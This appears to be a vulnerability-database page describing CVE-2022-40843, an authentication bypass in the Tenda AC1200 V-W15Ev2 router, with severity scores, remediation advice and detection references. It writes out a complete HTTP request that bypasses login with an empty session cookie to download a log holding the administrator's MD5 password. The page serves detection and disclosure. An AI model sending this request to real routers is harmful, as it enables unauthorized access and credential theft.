🔙 목록으로 돌아가기

CVE-2022-40843: Tenda AC1200 V-W15Ev2 - Authentication Bypass

TitleTenda AC1200 V-W15Ev2 - Authentication Bypass
Authorgy741
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information.
RemediationApply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
CVSS Score4.9
EPSS Score0.40404
CVE IDCVE-2022-40843
CWE IDCWE-287
Tags cve2022 cve tenda auth-bypass router iot vkev vuln

🔍 Vulnerability Description

The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router’s login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router’s file, which contains the MD5 password of the Administrator’s user account. This vulnerability exists within the local web and hosted remote management console.

🌐 HTTP Request

GET /goform/downloadSyslog/syslog.log HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2 rv:2.0; mai-IN) AppleWebKit/533.27.1 (KHTML, like Gecko) Version/5.0 Safari/533.27.1
Connection: close
Cookie: W15Ev2_user=
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-40843.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-40843.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A